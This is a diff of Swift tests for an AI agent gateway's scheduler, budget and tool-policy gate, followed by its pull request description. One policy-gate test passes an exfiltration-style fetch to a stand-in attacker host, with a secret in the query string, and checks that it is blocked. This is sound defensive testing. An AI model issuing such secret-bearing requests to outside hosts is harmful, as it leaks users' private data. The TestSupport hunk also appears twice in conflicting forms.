+        sql: "UPDATE runs SET origin = 'scheduled' WHERE id = ?",
+        arguments: [otherRunId]
+      )
     }
-
-    let provider = StubLLMProvider(agentOutcome)
-    let agent = AgentRuntime(
-      provider: provider,
-      typingIndicator: NoopTyping(),
-      draftStreamer: NoopRichDraftStreaming(),
-      streamingEnabled: false,
-      costResolver: CostResolver(
-        priceTable: .empty,
-        referenceUSDPerToken: RunBudget.default.referenceUSDPerToken
-      ),
-      budget: budget,
-      model: "gpt-4o",
-      usageStore: usage,
-      auditLog: audit,
-      sleep: { try await Task.sleep(for: $0) }
+    try UsageStoreGRDB(writer: env.queue).recordUsage(
+      ProviderUsage(
+        runId: otherRunId,
+        sessionId: try #require(otherClaim.sessionId),
+        model: "m",
+        promptTokens: 10,
+        completionTokens: 5,
+        costUSD: 2.50,
+        costSource: .heuristic,
+        isEstimated: true,
+        ts: Date()
+      )
     )
 
-    let runner = TurnRunner(
-      sessionMessages: sessionMessagesForRunner ?? sessionMessages,
-      runs: runsFactory?(queue, sessionId) ?? runs ?? RunStoreGRDB(writer: queue),
-      usageStore: usage,
-      audit: audit,
-      agent: agent,
-      budget: budget,
-      contextBuilder: builder,
-      pendingConfirmations: PendingConfirmationRegistry(),
-      notifyOutbox: {},
-      logger: Logger(label: "test")
+    // when — the OWNER's interactive run at the same moment
+    try await env.runner.run(
+      runId: env.runId,
+      sessionId: env.sessionId,
+      chatId: env.chatId,
+      triggerMessageId: env.triggerMessageId,
+      grant: nil
     )
 
-    return Env(
-      runner: runner,
-      queue: queue,
-      sessionMessages: sessionMessages,
-      outbox: outbox,
-      sessionId: sessionId,
-      chatId: chatId,
-      runId: runId,
-      triggerMessageId: triggerMessageId,
-      provider: provider
-    )
-  }
-
-  private func latestRunState(_ queue: DatabaseQueue) throws -> String? {
-    try queue.read { db in
-      try String.fetchOne(db, sql: "SELECT state FROM runs ORDER BY id DESC LIMIT 1")
+    // then — completes normally; the proactive pool binds proactive runs only
+    let state = try await env.queue.read { db in
+      try String.fetchOne(db, sql: "SELECT state FROM runs WHERE id = ?", arguments: [env.runId])
     }
-  }
-
-  private func okResponse(content: String) -> ChatResponse {
-    ChatResponse(
-      content: content,
-      finishReason: "stop",
-      usage: ChatUsage(promptTokens: 10, completionTokens: 5, totalTokens: 15),
-      costFromProvider: 0.0021
-    )
+    #expect(state == "DONE")
   }
 
   @Test func completedTurnCommitsDoneRunAndEnqueuesOneOutboxRow() async throws {

--- a/Tests/ClawGatewayTests/Routing/TurnRunnerTests.swift
+++ b/Tests/ClawGatewayTests/Routing/TurnRunnerTests.swift
@@ -625,6 +625,7 @@ struct SnapshotFailingSessionMessages: SessionMessageStore {
       retryBudget: RunBudget.default.retryBudget,
       perRunUSD: RunBudget.default.perRunUSD,
       perDayUSD: RunBudget.default.perDayUSD,
+      proactivePerDayUSD: RunBudget.default.proactivePerDayUSD,
       referenceUSDPerToken: RunBudget.default.referenceUSDPerToken,
       dayTokenCeilingOverride: 1
     )

--- a/Tests/ClawGatewayTests/Services/SchedulerServiceTests.swift
+++ b/Tests/ClawGatewayTests/Services/SchedulerServiceTests.swift
@@ -1,0 +1,406 @@
+import ClawAgent
+import ClawCore
+import Foundation
+import Logging
+import Testing
+
+@testable import ClawGateway
+
+/// A scripted `ScheduledJobStore`: seeded jobs, recorded claim/skip/tick calls, one canned claim
+/// result. A lock-guarded class, not an actor, for the same reason as `RecordingUsageStore`
+/// (the protocol is synchronous).
+final class ScriptedJobStore: ScheduledJobStore, @unchecked Sendable {
+  struct ClaimCall: Equatable {
+    let jobId: Int64
+    let due: Date
+    let fireAt: Date
+    let nextOccurrence: Date?
+  }
+
+  struct SkipCall: Equatable {
+    let jobId: Int64
+    let due: Date
+    let nextOccurrence: Date?
+    let skippedCount: Int
+  }
+
+  private let lock = NSLock()
+  private var seededJobs: [ScheduledJob]
+  private var recordedClaims: [ClaimCall] = []
+  private var recordedSkips: [SkipCall] = []
+  private var recordedTicks: [Date] = []
+  private let claimResult: ClaimedFire?
+
+  init(jobs: [ScheduledJob], claimResult: ClaimedFire?) {
+    seededJobs = jobs
+    self.claimResult = claimResult
+  }
+
+  var claims: [ClaimCall] {
+    lock.lock()
+    defer { lock.unlock() }
+    return recordedClaims
+  }
+
+  var skips: [SkipCall] {
+    lock.lock()
+    defer { lock.unlock() }
+    return recordedSkips
+  }
+
+  var ticks: [Date] {
+    lock.lock()
+    defer { lock.unlock() }
+    return recordedTicks
+  }
+
+  func dueJobs(now: Date) throws -> [ScheduledJob] {
+    lock.lock()
+    defer { lock.unlock() }
+    // Mirrors the store contract: status='ACTIVE' AND next_occurrence <= now.
+    return seededJobs.filter { job in
+      job.status == .active && job.nextOccurrence.map { occurrence in occurrence <= now } == true
+    }
+  }
+
+  func claimAndFire(
+    jobId: Int64,
+    due: Date,
+    fireAt: Date,
+    nextOccurrence: Date?,
+    now: Date
+  ) throws -> ClaimedFire? {
+    lock.lock()
+    defer { lock.unlock() }
+    recordedClaims.append(
+      ClaimCall(jobId: jobId, due: due, fireAt: fireAt, nextOccurrence: nextOccurrence)
+    )
+    return claimResult
+  }
+
+  func skipMisfire(
+    jobId: Int64,
+    due: Date,
+    nextOccurrence: Date?,
+    skippedCount: Int,
+    now: Date
+  ) throws -> Bool {
+    lock.lock()
+    defer { lock.unlock() }
+    recordedSkips.append(
+      SkipCall(jobId: jobId, due: due, nextOccurrence: nextOccurrence, skippedCount: skippedCount)
+    )
+    return true
+  }
+
+  func recordTick(at tickTime: Date) throws {
+    lock.lock()
+    defer { lock.unlock() }
+    recordedTicks.append(tickTime)
+  }
+
+  // Unused by the ticker — loud if the service ever starts calling them.
+  func create(_ job: NewScheduledJob, now: Date) throws -> ScheduledJob {
+    throw StoreError.unexpected("unused by SchedulerService")
+  }
+
+  func job(id: Int64) throws -> ScheduledJob? { nil }
+
+  func listAll() throws -> [ScheduledJob] { [] }
+
+  func fireNow(jobId: Int64, now: Date) throws -> ClaimedFire? {
+    throw StoreError.unexpected("unused by SchedulerService")
+  }
+
+  func pause(id: Int64, now: Date) throws -> ScheduledJob? {
+    throw StoreError.unexpected("unused by SchedulerService")
+  }
+
+  func resume(id: Int64, nextOccurrence: Date?, now: Date) throws -> ScheduledJob? {
+    throw StoreError.unexpected("unused by SchedulerService")
+  }
+
+  func cancel(id: Int64, now: Date) throws -> ScheduledJob? {
+    throw StoreError.unexpected("unused by SchedulerService")
+  }
+
+  func schedulerState() throws -> SchedulerState {
+    SchedulerState(
+      lastTickAt: nil,
+      lastMisfireAt: nil,
+      lastMisfireSkippedCount: 0,
+      lastHeartbeatAt: nil,
+      heartbeatCountDay: nil,
+      heartbeatCount: 0
+    )
+  }
+
+  func fireHeartbeat(
+    prompt: String,
+    ownerChatId: Int64,
+    now: Date,
+    day: String
+  ) throws -> ClaimedFire {
+    throw StoreError.unexpected("unused until Phase 4")
+  }
+}
+
+/// Records the durations the run() loop sleeps; throwing ends the loop like a cancellation.
+private final class SleepRecorder: @unchecked Sendable {
+  private let lock = NSLock()
+  private var recordedDurations: [Duration] = []
+
+  var durations: [Duration] {
+    lock.lock()
+    defer { lock.unlock() }
+    return recordedDurations
+  }
+
+  func append(_ duration: Duration) {
+    lock.lock()
+    defer { lock.unlock() }
+    recordedDurations.append(duration)
+  }
+}
+
+@Suite struct SchedulerServiceTests {
+  /// The occurrence phase anchor; the every-5-min rule recurs at anchor + k·300 s exactly.
+  private let anchor = Date(timeIntervalSince1970: 1_750_000_000)
+
+  private func everyFiveMinutesRule() -> Calendar.RecurrenceRule {
+    var calendar = Calendar(identifier: .gregorian)
+    calendar.timeZone = TimeZone(identifier: "Europe/Berlin") ?? .gmt
+    return Calendar.RecurrenceRule(calendar: calendar, frequency: .minutely, interval: 5)
+  }
+
+  private func makeJob(
+    id: Int64 = 7,
+    recurrence: RecurrenceEnvelope?,
+    nextOccurrence: Date?,
+    status: ScheduledJobStatus = .active
+  ) -> ScheduledJob {
+    ScheduledJob(
+      id: id,
+      ownerChatId: 42,
+      label: "digest",
+      prompt: "Summarize my unread items",
+      recurrence: recurrence,
+      timezone: "Europe/Berlin",
+      nextOccurrence: nextOccurrence,
+      lastFiredAt: nil,
+      status: status,
+      sessionId: nil,
+      createdTs: anchor,
+      updatedTs: anchor
+    )
+  }
+
+  private struct Fixture {
+    let service: SchedulerService
+    let store: ScriptedJobStore
+    let runner: FakeTurnRunner
+  }
+
+  private func makeFixture(
+    jobs: [ScheduledJob],
+    claimResult: ClaimedFire? = ClaimedFire(
+      runId: 900,
+      sessionId: 500,
+      triggerMessageId: 300,
+      ownerChatId: 42
+    ),
+    now: Date
+  ) -> Fixture {
+    let store = ScriptedJobStore(jobs: jobs, claimResult: claimResult)
+    let runner = FakeTurnRunner()
+    let service = SchedulerService(
+      jobs: store,
+      lanes: SessionLaneRegistry(),
+      turns: runner,
+      calculator: OccurrenceCalculator(),
+      catchUpMaxAge: .seconds(1800),
+      now: { now },
+      sleep: { _ in },
+      logger: Logger(label: "test")
+    )
+    return Fixture(service: service, store: store, runner: runner)
+  }
+
+  @Test func onTimeDueJobFiresAtItsOccurrenceAndRunsOnTheLane() async throws {
+    // given — due 30 s ago: lateness ≤ the 60 s grain ⇒ fire at the stored occurrence
+    let due = anchor.addingTimeInterval(600)
+    let now = due.addingTimeInterval(30)
+    let job = makeJob(
+      recurrence: RecurrenceEnvelope(schemaVersion: 1, rule: everyFiveMinutesRule()),
+      nextOccurrence: due
+    )
+    let fixture = makeFixture(jobs: [job], now: now)
+
+    // when
+    await fixture.service.tick()
+
+    // then — CAS on due, fireAt == due, next advanced strictly past now (T0+900)
+    #expect(fixture.store.ticks == [now])
+    #expect(
+      fixture.store.claims == [
+        ScriptedJobStore.ClaimCall(
+          jobId: 7,
+          due: due,
+          fireAt: due,
+          nextOccurrence: anchor.addingTimeInterval(900)
+        )
+      ]
+    )
+    #expect(fixture.store.skips.isEmpty)
+
+    // and the claimed fire ran through the session lane with the ClaimedFire identity
+    await fixture.runner.waitForCalls(atLeast: 1)
+    let call = try #require(await fixture.runner.calls.first)
+    #expect(
+      call
+        == FakeTurnRunner.Call(
+          runId: 900,
+          sessionId: 500,
+          chatId: 42,
+          triggerMessageId: 300,
+          grant: nil
+        )
+    )
+  }
+
+  @Test func missedOccurrencesInsideTheWindowCoalesceToOneFireAtTheLatest() async throws {
+    // given — due at T0+300; now T0+1530: five occurrences missed (300…1500), all < 30 min old
+    let due = anchor.addingTimeInterval(300)
+    let now = anchor.addingTimeInterval(1530)
+    let job = makeJob(
+      recurrence: RecurrenceEnvelope(schemaVersion: 1, rule: everyFiveMinutesRule()),
+      nextOccurrence: due
+    )
+    let fixture = makeFixture(jobs: [job], now: now)
+
+    // when
+    await fixture.service.tick()
+
+    // then — exactly ONE claim: CAS still on the stored due, T_fire = the latest missed (§5.2/§5.3)
+    #expect(
+      fixture.store.claims == [
+        ScriptedJobStore.ClaimCall(
+          jobId: 7,
+          due: due,
+          fireAt: anchor.addingTimeInterval(1500),
+          nextOccurrence: anchor.addingTimeInterval(1800)
+        )
+      ]
+    )
+    #expect(fixture.store.skips.isEmpty)
+  }
+
+  @Test func occurrencesOlderThanTheCatchUpWindowAreSkippedWithNoRun() async throws {
+    // given — due at T0+300; now T0+2100: lateness 1800 s == catchUpMaxAge ⇒ skip (≥ boundary)
+    let due = anchor.addingTimeInterval(300)
+    let now = anchor.addingTimeInterval(2100)
+    let job = makeJob(
+      recurrence: RecurrenceEnvelope(schemaVersion: 1, rule: everyFiveMinutesRule()),
+      nextOccurrence: due
+    )
+    let fixture = makeFixture(jobs: [job], now: now)
+
+    // when
+    await fixture.service.tick()
+
+    // then — no run; next advanced past now; the missed count (300…2100 = 7) recorded
+    #expect(fixture.store.claims.isEmpty)
+    #expect(
+      fixture.store.skips == [
+        ScriptedJobStore.SkipCall(
+          jobId: 7,
+          due: due,
+          nextOccurrence: anchor.addingTimeInterval(2400),
+          skippedCount: 7
+        )
+      ]
+    )
+    #expect(await fixture.runner.calls.isEmpty)
+  }
+
+  @Test func pausedJobsNeverFire() async throws {
+    // given — a PAUSED job whose occurrence is long past; the scan predicate excludes it
+    let due = anchor.addingTimeInterval(300)
+    let now = anchor.addingTimeInterval(600)
+    let job = makeJob(
+      recurrence: RecurrenceEnvelope(schemaVersion: 1, rule: everyFiveMinutesRule()),
+      nextOccurrence: due,
+      status: .paused
+    )
+    let fixture = makeFixture(jobs: [job], now: now)
+
+    // when
+    await fixture.service.tick()
+
+    // then — the tick still records; nothing fires or skips
+    #expect(fixture.store.ticks == [now])
+    #expect(fixture.store.claims.isEmpty)
+    #expect(fixture.store.skips.isEmpty)
+  }
+
+  @Test func oneShotJobFiresWithNilNextOccurrence() async throws {
+    // given — recurrence nil ⇔ one-shot; the store completes it on nil (§5.2)
+    let due = anchor.addingTimeInterval(600)
+    let now = due.addingTimeInterval(30)
+    let fixture = makeFixture(jobs: [makeJob(recurrence: nil, nextOccurrence: due)], now: now)
+
+    // when
+    await fixture.service.tick()
+
+    // then
+    #expect(
+      fixture.store.claims == [
+        ScriptedJobStore.ClaimCall(jobId: 7, due: due, fireAt: due, nextOccurrence: nil)
+      ]
+    )
+  }
+
+  @Test func lostClaimEnqueuesNothing() async throws {
+    // given — the CAS matched no row (claimed elsewhere / job mutated): claimAndFire → nil
+    let due = anchor.addingTimeInterval(600)
+    let now = due.addingTimeInterval(30)
+    let job = makeJob(
+      recurrence: RecurrenceEnvelope(schemaVersion: 1, rule: everyFiveMinutesRule()),
+      nextOccurrence: due
+    )
+    let fixture = makeFixture(jobs: [job], claimResult: nil, now: now)
+
+    // when
+    await fixture.service.tick()
+
+    // then — the claim was attempted, but no turn was dispatched
+    #expect(fixture.store.claims.count == 1)
+    #expect(await fixture.runner.calls.isEmpty)
+  }
+
+  @Test func runTicksImmediatelyThenSleepsTheTickInterval() async throws {
+    // given — a sleep that records its duration and ends the loop like a cancellation
+    let recorder = SleepRecorder()
+    let store = ScriptedJobStore(jobs: [], claimResult: nil)
+    let service = SchedulerService(
+      jobs: store,
+      lanes: SessionLaneRegistry(),
+      turns: FakeTurnRunner(),
+      calculator: OccurrenceCalculator(),
+      catchUpMaxAge: .seconds(1800),
+      now: { Date(timeIntervalSince1970: 1_750_000_000) },
+      sleep: { duration in
+        recorder.append(duration)
+        throw CancellationError()
+      },
+      logger: Logger(label: "test")
+    )
+
+    // when — restart recovery: the first tick happens BEFORE the first sleep
+    try await service.run()
+
+    // then
+    #expect(store.ticks.count == 1)
+    #expect(recorder.durations == [SchedulerService.tickInterval])
+  }
+}

--- a/Tests/ClawGatewayTests/Services/TelegramPollerServiceTests.swift
+++ b/Tests/ClawGatewayTests/Services/TelegramPollerServiceTests.swift
@@ -218,4 +218,21 @@ private actor BlockingTurnRunner: TurnDispatching {
     // then
     try await task.value  // returns cleanly, no throw/crash
   }
+
+  @Test func readTimeoutOnGetUpdatesBacksOffAndTheLoopSurvives() async throws {
+    // given — a socket read timeout surfaces from the client as TelegramError.transport (A3)
+    let stack = try makeStack(
+      batches: [],
+      allowed: [42],
+      throwOnGetUpdates: .transport("getUpdates: read timed out")
+    )
+
+    // when — the first poll throws; react() logs + backs off; cancel mid-backoff
+    let task = Task { try await stack.poller.run() }
+    await stack.transport.waitForPolls(atLeast: 1)
+    task.cancel()
+
+    // then — the loop absorbed the network error and exits cleanly, never crashing the daemon
+    try await task.value
+  }
 }

--- a/Tests/ClawGatewayTests/Support/TestSupport.swift
+++ b/Tests/ClawGatewayTests/Support/TestSupport.swift
@@ -237,7 +237,7 @@ func makeSeededFixture() throws -> SeededFixture {
   )
   let runId = try #require(claim.runId)
   let runs = RunStoreGRDB(writer: queue)
-  #expect(try runs.pickUp(runId: runId, now: Date()) != nil)
+  _ = try #require(try runs.pickUp(runId: runId, now: Date()))
   return SeededFixture(
     outbox: OutboxStoreGRDB(writer: queue),
     runs: runs,

--- a/Tests/ClawGatewayTests/Support/TestSupport.swift
+++ b/Tests/ClawGatewayTests/Support/TestSupport.swift
@@ -237,7 +237,7 @@ func makeSeededFixture() throws -> SeededFixture {
   )
   let runId = try #require(claim.runId)
   let runs = RunStoreGRDB(writer: queue)
-  #expect(try runs.pickUp(runId: runId, now: Date()))
+  #expect(try runs.pickUp(runId: runId, now: Date()) != nil)
   return SeededFixture(
     outbox: OutboxStoreGRDB(writer: queue),
     runs: runs,

--- a/Tests/ClawTelegramTests/Client/TelegramClientTests.swift
+++ b/Tests/ClawTelegramTests/Client/TelegramClientTests.swift
@@ -326,4 +326,30 @@ private func client(status: Int, json: String) -> TelegramClient {
     let linkPreviewOptions = try #require(body["link_preview_options"] as? [String: Any])
     #expect(linkPreviewOptions["is_disabled"] as? Bool == true)
   }
+
+  @Test func getUpdatesSocketTimeoutIsLongPollTimeoutPlusTenSeconds() async throws {
+    // given (§18-A3): the socket read timeout must outlive the long poll by exactly 10 s, so a
+    // stalled poll is cut and re-issued instead of hanging the loop across a network gap
+    let recorder = RecordingHTTPExecutor.Recorder()
+    let telegram = TelegramClient(
+      token: "T",
+      http: RecordingHTTPExecutor(
+        recorder: recorder,
+        result: HTTPResult(
+          statusCode: 200,
+          headers: [:],
+          body: Data(#"{"ok":true,"result":[]}"#.utf8)
+        )
+      ),
+      baseURL: "https://example.test"
+    )
+
+    // when
+    _ = try await telegram.getUpdates(offset: nil, timeout: 30, allowedUpdates: ["message"])
+
+    // then
+    let call = try #require(await recorder.calls.first)
+    #expect(call.timeout == 40)
+    #expect(TelegramClient.defaultHTTPTimeoutSlackSeconds == 10)
+  }
 }

--- a/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
+++ b/Tests/ClawToolsTests/Policy/ToolPolicyGateTests.swift
@@ -22,7 +22,8 @@ import Testing
     assemblyPrivate: Bool = false,
     runPrivate: Bool = false,
     grant: OneTurnGrant? = nil,
-    approvalPending: Bool = false
+    approvalPending: Bool = false,
+    nonInteractive: Bool = false
   ) -> ToolDispatchContext {
     ToolDispatchContext(
       sessionTainted: tainted,
@@ -30,7 +31,8 @@ import Testing
       assemblyPrivateData: assemblyPrivate,
       runPrivateData: runPrivate,
       grant: grant,
-      approvalAlreadyPending: approvalPending
+      approvalAlreadyPending: approvalPending,
+      nonInteractive: nonInteractive
     )
   }
 
@@ -241,6 +243,64 @@ import Testing
     }
     #expect(payload.status == .error)
   }
+
+  @Test func nonInteractiveTrifectaHardDeniesWithoutParkingAnApproval() {
+    // given — the exact trifecta state that parks interactively (§10: would-park ⇒ DENY)
+    let gate = makeGate()
+
+    // when
+    let interactive = gate.evaluate(
+      call: fetchCall("https://example.com/a?q=1"),
+      context: makeContext(tainted: true, assemblyPrivate: true)
+    )
+    let nonInteractive = gate.evaluate(
+      call: fetchCall("https://example.com/a?q=1"),
+      context: makeContext(tainted: true, assemblyPrivate: true, nonInteractive: true)
+    )
+
+    // then — interactive still parks; non-interactive DENIES with no pending approval
+    guard case .block(let parkPayload, _, let parkedApproval) = interactive else {
+      Issue.record("expected interactive park, got \(interactive)")
+      return
+    }
+    #expect(parkPayload.status == .blockedPendingApproval)
+    #expect(parkedApproval != nil)
+    guard case .block(let denyPayload, let denyRedacted, nil) = nonInteractive else {
+      Issue.record("expected hard DENY, got \(nonInteractive)")
+      return
+    }
+    #expect(denyPayload.status == .error)
+    #expect(denyPayload.content.contains("needs your approval"))
+    #expect(denyPayload.content.contains("run it interactively"))
+    // The audited args rendering is unchanged in shape — same redacted-args seam field.
+    #expect(denyRedacted == #"{"url":"https://example.com/a?q=1"}"#)
+  }
+
+  @Test func nonInteractiveDenyLeavesEveryEarlierTierUntouched() {
+    // given — tier-1/2 blocks and the outside-trifecta allow behave identically non-interactively
+    let gate = makeGate()
+
+    // when
+    let argBlock = gate.evaluate(
+      call: fetchCall("https://evil.example/?t=s3cret-value-1"),
+      context: makeContext(nonInteractive: true)
+    )
+    let cleanAllow = gate.evaluate(
+      call: fetchCall("https://example.com/a"),
+      context: makeContext(nonInteractive: true)
+    )
+
+    // then
+    guard case .block(let payload, _, nil) = argBlock else {
+      Issue.record("expected blocked args, got \(argBlock)")
+      return
+    }
+    #expect(payload.status == .blockedArgs)
+    guard case .allow = cleanAllow else {
+      Issue.record("expected allow, got \(cleanAllow)")
+      return
+    }
+  }
 }
 
 @Suite struct GatedToolDispatcherTests {
@@ -263,7 +323,8 @@ import Testing
     assemblyPrivateData: false,
     runPrivateData: false,
     grant: nil,
-    approvalAlreadyPending: false
+    approvalAlreadyPending: false,
+    nonInteractive: false
   )
 
   @Test func unknownToolIsAnErrorObservationNeverACrash() async {


### PR DESCRIPTION
Builds the execution spine that lets a scheduled job actually fire and run, and makes the daemon tick. This lands on existing seams — no new module. There's still no way to *create* a scheduled job (that's the next branch), so the scheduler ticks live but idle and `main` stays shippable.

## What's here

- **Nested proactive budget.** Scheduled/heartbeat runs draw from a separate $2.00/day pool nested inside the global $10/day kill-switch. The global caps are checked first, unchanged; interactive use is never affected. A trip DMs the owner at most once per UTC day and is visible in `doctor`.
- **Run origin end-to-end.** `pickUp` now returns the run's `RunOrigin` in the same write (fail-closed to `scheduled` on an unknown value), threaded through the preflight budget check and the tool-dispatch context.
- **Reduced privilege at the one gate.** A non-interactive run that would park a tool approval gets an immediate audited DENY instead — no pending entry is ever created, so nothing can bind to the owner's next unrelated reply.
- **`SchedulerService`.** A 60s wall-clock ticker: scans due jobs, claims each through the store's fused compare-and-advance (fire-once), applies the lateness/misfire policy (on-time, coalesce, or skip), and enqueues fires onto the job session's lane. Composed into the daemon alongside the poller and outbox dispatcher.
- **Failure accounting.** `jobFailed` is audited in the same transaction as every FAILED transition, and boot reconciliation now routes a crashed job run's owner notice via the job row.
- **A3 + doctor.** getUpdates read timeout pinned to long-poll + 10s; new `doctor` rows for scheduler state, due count, and proactive spend.

## Verification

`swift build` clean · `swift test` 664/664 · `scripts/lint.sh` ok. The fire-once claim (concurrent-claim CAS keystone) and the DST occurrence math from the prior branch stay green. Every task was built test-first; the misfire arithmetic is pinned against the real Foundation recurrence engine with exact instants (no tolerance windows).

## Notes for review

- The daemon composes three services now (poller, dispatcher, scheduler); with no job rows the scheduler just records ticks — `scheduler.last_tick_at` advances in `doctor`.
- `TurnRunnerTests` will want splitting before the heartbeat-suppression tests land next.
